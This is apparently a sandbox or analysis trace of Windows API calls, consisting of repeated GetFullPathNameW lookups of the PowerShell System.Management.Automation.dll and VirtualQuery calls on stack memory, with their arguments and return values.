	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.769] VirtualQuery (in: lpAddress=0x12b1d0, lpBuffer=0x12c090, dwLength=0x30 | out: lpBuffer=0x12c090*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.769] VirtualQuery (in: lpAddress=0x12b260, lpBuffer=0x12c120, dwLength=0x30 | out: lpBuffer=0x12c120*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12b8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.770] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.771] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.771] VirtualQuery (in: lpAddress=0x12bc70, lpBuffer=0x12cb30, dwLength=0x30 | out: lpBuffer=0x12cb30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.772] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] VirtualQuery (in: lpAddress=0x12bc70, lpBuffer=0x12cb30, dwLength=0x30 | out: lpBuffer=0x12cb30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.776] VirtualQuery (in: lpAddress=0x12bc70, lpBuffer=0x12cb30, dwLength=0x30 | out: lpBuffer=0x12cb30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.780] VirtualQuery (in: lpAddress=0x12bc70, lpBuffer=0x12cb30, dwLength=0x30 | out: lpBuffer=0x12cb30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.780] VirtualQuery (in: lpAddress=0x12b360, lpBuffer=0x12c220, dwLength=0x30 | out: lpBuffer=0x12c220*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.780] VirtualQuery (in: lpAddress=0x12b3f0, lpBuffer=0x12c2b0, dwLength=0x30 | out: lpBuffer=0x12c2b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.781] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.782] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.782] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.782] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.782] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.782] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
